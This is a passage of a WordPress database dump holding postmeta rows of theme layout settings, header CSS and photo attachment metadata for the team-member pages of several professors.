(30117,3948,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30118,3950,'_edit_lock','1680418532:1'),
(30119,3951,'_wp_attached_file','2023/03/dr-akrm.bmp'),
(30120,3951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:181;s:6:\"height\";i:238;s:4:\"file\";s:19:\"2023/03/dr-akrm.bmp\";s:8:\"filesize\";i:129526;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30121,3950,'_thumbnail_id','3951'),
(30122,3950,'_edit_last','1'),
(30123,3950,'_dt_sidebar_position','disabled'),
(30124,3950,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30125,3950,'_dt_sidebar_hide_on_mobile','0'),
(30126,3950,'_dt_footer_show','1'),
(30127,3950,'_dt_footer_widgetarea_id','sidebar_2'),
(30128,3950,'_dt_footer_hide_on_mobile','0'),
(30129,3950,'_dt_header_title','fancy'),
(30130,3950,'_dt_header_background','normal'),
(30131,3950,'_dt_header_background_below_slideshow','disabled'),
(30132,3950,'_dt_header_transparent_bg_color_scheme','light'),
(30133,3950,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30134,3950,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30135,3950,'_dt_header_transparent_bg_color','#000000'),
(30136,3950,'_dt_header_transparent_bg_opacity','50'),
(30137,3950,'_dt_header_disabled_background','normal'),
(30138,3950,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30139,3950,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30140,3950,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30141,3950,'_dt_header_disabled_transparent_bg_color','#000000'),
(30142,3950,'_dt_header_disabled_transparent_bg_opacity','50'),
(30143,3950,'_dt_page_overrides_top_margin',''),
(30144,3950,'_dt_page_overrides_right_margin',''),
(30145,3950,'_dt_page_overrides_bottom_margin',''),
(30146,3950,'_dt_page_overrides_left_margin',''),
(30147,3950,'_dt_mobile_page_padding_top',''),
(30148,3950,'_dt_mobile_page_padding_right',''),
(30149,3950,'_dt_mobile_page_padding_bottom',''),
(30150,3950,'_dt_mobile_page_padding_left',''),
(30151,3950,'_dt_fancy_header_layout_heading',''),
(30152,3950,'_dt_fancy_header_title_aligment','center'),
(30153,3950,'_dt_fancy_header_height','300'),
(30154,3950,'_dt_fancy_header_padding-top','0px'),
(30155,3950,'_dt_fancy_header_padding-bottom','0px'),
(30156,3950,'_dt_fancy_header_breadcrumbs_heading',''),
(30157,3950,'_dt_fancy_header_breadcrumbs','disabled'),
(30158,3950,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30159,3950,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30160,3950,'_dt_fancy_header_title_heading',''),
(30161,3950,'_dt_fancy_header_title_mode','custom'),
(30162,3950,'_dt_fancy_header_title','Prof. Akram Soliman Elselmy'),
(30163,3950,'_dt_fancy_header_title_font_size','30'),
(30164,3950,'_dt_fancy_header_title_line_height','36'),
(30165,3950,'_dt_fancy_header_text_transform','none'),
(30166,3950,'_dt_fancy_header_title_color_mode','color'),
(30167,3950,'_dt_fancy_header_title_color','#ffffff'),
(30168,3950,'_dt_fancy_header_subtitle_heading',''),
(30169,3950,'_dt_fancy_header_subtitle',''),
(30170,3950,'_dt_fancy_header_subtitle_font_size','18'),
(30171,3950,'_dt_fancy_header_subtitle_line_height','26'),
(30172,3950,'_dt_fancy_header_subtitle_text_transform','none'),
(30173,3950,'_dt_fancy_header_subtitle_color_mode','color'),
(30174,3950,'_dt_fancy_header_subtitle_color','#ffffff'),
(30175,3950,'_dt_fancy_header_bg_heading',''),
(30176,3950,'_dt_fancy_header_bg_color','#222222'),
(30177,3950,'_dt_fancy_header_bg_image_origin','custom'),
(30178,3950,'_dt_fancy_header_bg_image','a:0:{}'),
(30179,3950,'_dt_fancy_header_bg_repeat','no-repeat'),
(30180,3950,'_dt_fancy_header_bg_position_x','center'),
(30181,3950,'_dt_fancy_header_bg_position_y','center'),
(30182,3950,'_dt_fancy_header_bg_fullscreen','1'),
(30183,3950,'_dt_fancy_header_bg_overlay','0'),
(30184,3950,'_dt_fancy_header_overlay_color','#000'),
(30185,3950,'_dt_fancy_header_bg_overlay_opacity','50'),
(30186,3950,'_dt_fancy_header_scroll_effect','default'),
(30187,3950,'_dt_fancy_header_bg_parallax','0.5'),
(30188,3950,'_dt_fancy_header_responsiveness_heading',''),
(30189,3950,'_dt_fancy_header_responsiveness','disabled'),
(30190,3950,'_dt_fancy_header_responsiveness_switch','778px'),
(30191,3950,'_dt_fancy_header_responsive_height','70'),
(30192,3950,'_dt_fancy_header_responsive_font_size','30'),
(30193,3950,'_dt_fancy_header_responsive_title_line_height','38'),
(30194,3950,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30195,3950,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30196,3950,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30197,3950,'_dt_teammate_options_go_to_single','1'),
(30198,3950,'_dt_teammate_options_position',''),
(30199,3950,'_dt_teammate_options_website',''),
(30200,3950,'_dt_teammate_options_mail',''),
(30201,3950,'_dt_teammate_options_facebook',''),
(30202,3950,'_dt_teammate_options_twitter',''),
(30203,3950,'_dt_teammate_options_dribbble',''),
(30204,3950,'_dt_teammate_options_you-tube',''),
(30205,3950,'_dt_teammate_options_rss',''),
(30206,3950,'_dt_teammate_options_delicious',''),
(30207,3950,'_dt_teammate_options_flickr',''),
(30208,3950,'_dt_teammate_options_lastfm',''),
(30209,3950,'_dt_teammate_options_linkedin',''),
(30210,3950,'_dt_teammate_options_vimeo',''),
(30211,3950,'_dt_teammate_options_tumbler',''),
(30212,3950,'_dt_teammate_options_pinterest',''),
(30213,3950,'_dt_teammate_options_devian',''),
(30214,3950,'_dt_teammate_options_skype',''),
(30215,3950,'_dt_teammate_options_github',''),
(30216,3950,'_dt_teammate_options_instagram',''),
(30217,3950,'_dt_teammate_options_stumbleupon',''),
(30218,3950,'_dt_teammate_options_behance',''),
(30219,3950,'_dt_teammate_options_px-500',''),
(30220,3950,'_dt_teammate_options_tripedvisor',''),
(30221,3950,'_dt_teammate_options_vk',''),
(30222,3950,'_dt_teammate_options_foursquare',''),
(30223,3950,'_dt_teammate_options_xing',''),
(30224,3950,'_dt_teammate_options_weibo',''),
(30225,3950,'_dt_teammate_options_odnoklassniki',''),
(30226,3950,'_dt_teammate_options_research-gate',''),
(30227,3950,'_dt_teammate_options_yelp',''),
(30228,3950,'_dt_teammate_options_blogger',''),
(30229,3950,'_dt_teammate_options_soundcloud',''),
(30230,3950,'_dt_teammate_options_viber',''),
(30231,3950,'_dt_teammate_options_whatsapp',''),
(30232,3950,'_dt_teammate_options_reddit',''),
(30233,3950,'_dt_teammate_options_snapchat',''),
(30234,3950,'_dt_teammate_options_telegram',''),
(30235,3950,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30236,3952,'_edit_lock','1680420376:1'),
(30237,3953,'_wp_attached_file','2023/03/dr-adel.bmp'),
(30238,3953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:180;s:6:\"height\";i:189;s:4:\"file\";s:19:\"2023/03/dr-adel.bmp\";s:8:\"filesize\";i:102114;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30239,3952,'_thumbnail_id','3953'),
(30240,3952,'_edit_last','1'),
(30241,3952,'_dt_sidebar_position','disabled'),
(30242,3952,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30243,3952,'_dt_sidebar_hide_on_mobile','0'),
(30244,3952,'_dt_footer_show','1'),
(30245,3952,'_dt_footer_widgetarea_id','sidebar_2'),
(30246,3952,'_dt_footer_hide_on_mobile','0'),
(30247,3952,'_dt_header_title','fancy'),
(30248,3952,'_dt_header_background','normal'),
(30249,3952,'_dt_header_background_below_slideshow','disabled'),
(30250,3952,'_dt_header_transparent_bg_color_scheme','light'),
(30251,3952,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30252,3952,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30253,3952,'_dt_header_transparent_bg_color','#000000'),
(30254,3952,'_dt_header_transparent_bg_opacity','50'),
(30255,3952,'_dt_header_disabled_background','normal'),
(30256,3952,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30257,3952,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30258,3952,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30259,3952,'_dt_header_disabled_transparent_bg_color','#000000'),
(30260,3952,'_dt_header_disabled_transparent_bg_opacity','50'),
(30261,3952,'_dt_page_overrides_top_margin',''),
(30262,3952,'_dt_page_overrides_right_margin',''),
(30263,3952,'_dt_page_overrides_bottom_margin',''),
(30264,3952,'_dt_page_overrides_left_margin',''),
(30265,3952,'_dt_mobile_page_padding_top',''),
(30266,3952,'_dt_mobile_page_padding_right',''),
(30267,3952,'_dt_mobile_page_padding_bottom',''),
(30268,3952,'_dt_mobile_page_padding_left',''),
(30269,3952,'_dt_fancy_header_layout_heading',''),
(30270,3952,'_dt_fancy_header_title_aligment','center'),
(30271,3952,'_dt_fancy_header_height','300'),
(30272,3952,'_dt_fancy_header_padding-top','0px'),
(30273,3952,'_dt_fancy_header_padding-bottom','0px'),
(30274,3952,'_dt_fancy_header_breadcrumbs_heading',''),
(30275,3952,'_dt_fancy_header_breadcrumbs','disabled'),
(30276,3952,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30277,3952,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30278,3952,'_dt_fancy_header_title_heading',''),
(30279,3952,'_dt_fancy_header_title_mode','custom'),
(30280,3952,'_dt_fancy_header_title','Prof. Dr. Adel M. Belal'),
(30281,3952,'_dt_fancy_header_title_font_size','30'),
(30282,3952,'_dt_fancy_header_title_line_height','36'),
(30283,3952,'_dt_fancy_header_text_transform','none'),
(30284,3952,'_dt_fancy_header_title_color_mode','color'),
(30285,3952,'_dt_fancy_header_title_color','#ffffff'),
(30286,3952,'_dt_fancy_header_subtitle_heading',''),
(30287,3952,'_dt_fancy_header_subtitle',''),
(30288,3952,'_dt_fancy_header_subtitle_font_size','18'),
(30289,3952,'_dt_fancy_header_subtitle_line_height','26'),
(30290,3952,'_dt_fancy_header_subtitle_text_transform','none'),
(30291,3952,'_dt_fancy_header_subtitle_color_mode','color'),
(30292,3952,'_dt_fancy_header_subtitle_color','#ffffff'),
(30293,3952,'_dt_fancy_header_bg_heading',''),
(30294,3952,'_dt_fancy_header_bg_color','#222222'),
(30295,3952,'_dt_fancy_header_bg_image_origin','custom'),
(30296,3952,'_dt_fancy_header_bg_image','a:0:{}'),
(30297,3952,'_dt_fancy_header_bg_repeat','no-repeat'),
(30298,3952,'_dt_fancy_header_bg_position_x','center'),
(30299,3952,'_dt_fancy_header_bg_position_y','center'),
(30300,3952,'_dt_fancy_header_bg_fullscreen','1'),
(30301,3952,'_dt_fancy_header_bg_overlay','0'),
(30302,3952,'_dt_fancy_header_overlay_color','#000'),
(30303,3952,'_dt_fancy_header_bg_overlay_opacity','50'),
(30304,3952,'_dt_fancy_header_scroll_effect','default'),
(30305,3952,'_dt_fancy_header_bg_parallax','0.5'),
(30306,3952,'_dt_fancy_header_responsiveness_heading',''),
(30307,3952,'_dt_fancy_header_responsiveness','enabled'),
(30308,3952,'_dt_fancy_header_responsiveness_switch','778px'),
(30309,3952,'_dt_fancy_header_responsive_height','70'),
(30310,3952,'_dt_fancy_header_responsive_font_size','30'),
(30311,3952,'_dt_fancy_header_responsive_title_line_height','38'),
(30312,3952,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30313,3952,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30314,3952,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30315,3952,'_dt_teammate_options_go_to_single','1'),
(30316,3952,'_dt_teammate_options_position',''),
(30317,3952,'_dt_teammate_options_website',''),
(30318,3952,'_dt_teammate_options_mail',''),
(30319,3952,'_dt_teammate_options_facebook',''),
(30320,3952,'_dt_teammate_options_twitter',''),
(30321,3952,'_dt_teammate_options_dribbble',''),
(30322,3952,'_dt_teammate_options_you-tube',''),
(30323,3952,'_dt_teammate_options_rss',''),
(30324,3952,'_dt_teammate_options_delicious',''),
(30325,3952,'_dt_teammate_options_flickr',''),
(30326,3952,'_dt_teammate_options_lastfm',''),
(30327,3952,'_dt_teammate_options_linkedin',''),
(30328,3952,'_dt_teammate_options_vimeo',''),
(30329,3952,'_dt_teammate_options_tumbler',''),
(30330,3952,'_dt_teammate_options_pinterest',''),
(30331,3952,'_dt_teammate_options_devian',''),
(30332,3952,'_dt_teammate_options_skype',''),
(30333,3952,'_dt_teammate_options_github',''),
(30334,3952,'_dt_teammate_options_instagram',''),
(30335,3952,'_dt_teammate_options_stumbleupon',''),
(30336,3952,'_dt_teammate_options_behance',''),
(30337,3952,'_dt_teammate_options_px-500',''),
(30338,3952,'_dt_teammate_options_tripedvisor',''),
(30339,3952,'_dt_teammate_options_vk',''),
(30340,3952,'_dt_teammate_options_foursquare',''),
(30341,3952,'_dt_teammate_options_xing',''),
(30342,3952,'_dt_teammate_options_weibo',''),
(30343,3952,'_dt_teammate_options_odnoklassniki',''),
(30344,3952,'_dt_teammate_options_research-gate',''),
(30345,3952,'_dt_teammate_options_yelp',''),
(30346,3952,'_dt_teammate_options_blogger',''),
(30347,3952,'_dt_teammate_options_soundcloud',''),
(30348,3952,'_dt_teammate_options_viber',''),
(30349,3952,'_dt_teammate_options_whatsapp',''),
(30350,3952,'_dt_teammate_options_reddit',''),
(30351,3952,'_dt_teammate_options_snapchat',''),
(30352,3952,'_dt_teammate_options_telegram',''),
(30353,3952,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30354,3954,'_edit_lock','1680419675:1'),
(30355,3954,'_edit_last','1'),
(30356,3954,'_dt_sidebar_position','disabled'),
(30357,3954,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30358,3954,'_dt_sidebar_hide_on_mobile','0'),
(30359,3954,'_dt_footer_show','1'),
(30360,3954,'_dt_footer_widgetarea_id','sidebar_2'),
(30361,3954,'_dt_footer_hide_on_mobile','0'),
(30362,3954,'_dt_header_title','fancy'),
(30363,3954,'_dt_header_background','normal'),
(30364,3954,'_dt_header_background_below_slideshow','disabled'),
(30365,3954,'_dt_header_transparent_bg_color_scheme','light'),
(30366,3954,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30367,3954,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30368,3954,'_dt_header_transparent_bg_color','#000000'),
(30369,3954,'_dt_header_transparent_bg_opacity','50'),
(30370,3954,'_dt_header_disabled_background','normal'),
(30371,3954,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30372,3954,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30373,3954,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30374,3954,'_dt_header_disabled_transparent_bg_color','#000000'),
(30375,3954,'_dt_header_disabled_transparent_bg_opacity','50'),
(30376,3954,'_dt_page_overrides_top_margin',''),
(30377,3954,'_dt_page_overrides_right_margin',''),
(30378,3954,'_dt_page_overrides_bottom_margin',''),
(30379,3954,'_dt_page_overrides_left_margin',''),
(30380,3954,'_dt_mobile_page_padding_top',''),
(30381,3954,'_dt_mobile_page_padding_right',''),
(30382,3954,'_dt_mobile_page_padding_bottom',''),
(30383,3954,'_dt_mobile_page_padding_left',''),
(30384,3954,'_dt_fancy_header_layout_heading',''),
(30385,3954,'_dt_fancy_header_title_aligment','center'),
(30386,3954,'_dt_fancy_header_height','300'),
(30387,3954,'_dt_fancy_header_padding-top','0px'),
(30388,3954,'_dt_fancy_header_padding-bottom','0px'),
(30389,3954,'_dt_fancy_header_breadcrumbs_heading',''),
(30390,3954,'_dt_fancy_header_breadcrumbs','disabled'),
(30391,3954,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30392,3954,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30393,3954,'_dt_fancy_header_title_heading',''),
(30394,3954,'_dt_fancy_header_title_mode','custom'),
(30395,3954,'_dt_fancy_header_title','Prof. Dr. Ayman A. Abdel-Hamid'),
(30396,3954,'_dt_fancy_header_title_font_size','30'),
(30397,3954,'_dt_fancy_header_title_line_height','36'),
(30398,3954,'_dt_fancy_header_text_transform','none'),
(30399,3954,'_dt_fancy_header_title_color_mode','color'),
(30400,3954,'_dt_fancy_header_title_color','#ffffff'),
(30401,3954,'_dt_fancy_header_subtitle_heading',''),
(30402,3954,'_dt_fancy_header_subtitle',''),
(30403,3954,'_dt_fancy_header_subtitle_font_size','18'),
(30404,3954,'_dt_fancy_header_subtitle_line_height','26'),
(30405,3954,'_dt_fancy_header_subtitle_text_transform','none'),
(30406,3954,'_dt_fancy_header_subtitle_color_mode','color'),
(30407,3954,'_dt_fancy_header_subtitle_color','#ffffff'),
(30408,3954,'_dt_fancy_header_bg_heading',''),
(30409,3954,'_dt_fancy_header_bg_color','#222222'),
(30410,3954,'_dt_fancy_header_bg_image_origin','custom'),
(30411,3954,'_dt_fancy_header_bg_image','a:0:{}'),
(30412,3954,'_dt_fancy_header_bg_repeat','no-repeat'),
(30413,3954,'_dt_fancy_header_bg_position_x','center'),
(30414,3954,'_dt_fancy_header_bg_position_y','center'),
(30415,3954,'_dt_fancy_header_bg_fullscreen','1'),
(30416,3954,'_dt_fancy_header_bg_overlay','0'),
(30417,3954,'_dt_fancy_header_overlay_color','#000'),
(30418,3954,'_dt_fancy_header_bg_overlay_opacity','50'),
(30419,3954,'_dt_fancy_header_scroll_effect','default'),
(30420,3954,'_dt_fancy_header_bg_parallax','0.5'),
(30421,3954,'_dt_fancy_header_responsiveness_heading',''),
(30422,3954,'_dt_fancy_header_responsiveness','enabled'),
(30423,3954,'_dt_fancy_header_responsiveness_switch','778px'),
(30424,3954,'_dt_fancy_header_responsive_height','70'),
(30425,3954,'_dt_fancy_header_responsive_font_size','30'),
(30426,3954,'_dt_fancy_header_responsive_title_line_height','38'),
(30427,3954,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30428,3954,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30429,3954,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30430,3954,'_dt_teammate_options_go_to_single','1'),
(30431,3954,'_dt_teammate_options_position',''),
(30432,3954,'_dt_teammate_options_website',''),
(30433,3954,'_dt_teammate_options_mail',''),
(30434,3954,'_dt_teammate_options_facebook',''),
(30435,3954,'_dt_teammate_options_twitter',''),
(30436,3954,'_dt_teammate_options_dribbble',''),
(30437,3954,'_dt_teammate_options_you-tube',''),
(30438,3954,'_dt_teammate_options_rss',''),
(30439,3954,'_dt_teammate_options_delicious',''),
(30440,3954,'_dt_teammate_options_flickr',''),
(30441,3954,'_dt_teammate_options_lastfm',''),
(30442,3954,'_dt_teammate_options_linkedin',''),
(30443,3954,'_dt_teammate_options_vimeo',''),
(30444,3954,'_dt_teammate_options_tumbler',''),
(30445,3954,'_dt_teammate_options_pinterest',''),
(30446,3954,'_dt_teammate_options_devian',''),
(30447,3954,'_dt_teammate_options_skype',''),
(30448,3954,'_dt_teammate_options_github',''),
(30449,3954,'_dt_teammate_options_instagram',''),
(30450,3954,'_dt_teammate_options_stumbleupon',''),
(30451,3954,'_dt_teammate_options_behance',''),
(30452,3954,'_dt_teammate_options_px-500',''),
(30453,3954,'_dt_teammate_options_tripedvisor',''),
(30454,3954,'_dt_teammate_options_vk',''),
(30455,3954,'_dt_teammate_options_foursquare',''),
(30456,3954,'_dt_teammate_options_xing',''),
(30457,3954,'_dt_teammate_options_weibo',''),
(30458,3954,'_dt_teammate_options_odnoklassniki',''),
(30459,3954,'_dt_teammate_options_research-gate',''),
(30460,3954,'_dt_teammate_options_yelp',''),
(30461,3954,'_dt_teammate_options_blogger',''),
(30462,3954,'_dt_teammate_options_soundcloud',''),
(30463,3954,'_dt_teammate_options_viber',''),
(30464,3954,'_dt_teammate_options_whatsapp',''),
(30465,3954,'_dt_teammate_options_reddit',''),
(30466,3954,'_dt_teammate_options_snapchat',''),
(30467,3954,'_dt_teammate_options_telegram',''),
(30468,3954,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30469,3955,'_edit_lock','1680418512:1'),
(30470,3956,'_wp_attached_file','2023/03/dr-alaa.bmp'),
(30471,3956,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:159;s:6:\"height\";i:213;s:4:\"file\";s:19:\"2023/03/dr-alaa.bmp\";s:8:\"filesize\";i:102294;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
